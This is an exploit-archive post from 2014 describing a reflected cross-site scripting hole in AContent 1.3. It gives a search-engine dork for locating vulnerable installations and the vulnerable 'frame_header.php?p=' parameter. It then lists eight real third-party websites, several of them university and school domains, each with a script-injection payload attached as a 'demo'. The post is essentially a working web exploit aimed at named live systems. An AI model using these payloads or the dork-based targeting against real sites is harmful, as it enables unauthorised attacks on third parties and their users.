AContent 1.3 Cross site scripting

2014-01-04 16:58:12
Posted by: Dr.3v1l

########################################################################
#
# Exploit Title: AContent 1.3 Cross site scripting
# Date: 2014 4 January
# Author: Hossein Hezami ( Dr.3v1l )
# Software Link: www.atutor.ca
# Version: 1.3
# Category: webapps
# Google Keywords: inurl:"/frame_header.php?p="
# Tested on: BackTrack5
#
########################################################################
#
# [+] Exploit :
#
# http://<server>/documentation/frame_header.php?p=[XSS]
#
########################################################################
#
# [+] Demo :
#
# www.stanford.edu/group/accessibility/cgi-bin/accessibilitychecker/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.bbqq.co.uk/AContent/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.csidtu.com/AContent/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.lernen.projekt-eloq.de/AContent/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.pulpa.utp.edu.co/AChecker/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.accesibilidad.utp.edu.co/AChecker/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.accessibility.activedition.com/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
# www.merleneotteyhighschool.com/content/documentation/frame_header.php?p="><script>alert(/3v1l/)</script>
#
########################################################################
#
# [+] Contact Me :
#
# [email protected]
# [email protected]
# Twitter.com/Doctor_3v1l
# IR.linkedin.com/in/Hossein3v1l
#
########################################################################
# Emperor Team , IeDB , RHH (UnderGround) , IrSecTeam ; BDB Friends
########################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.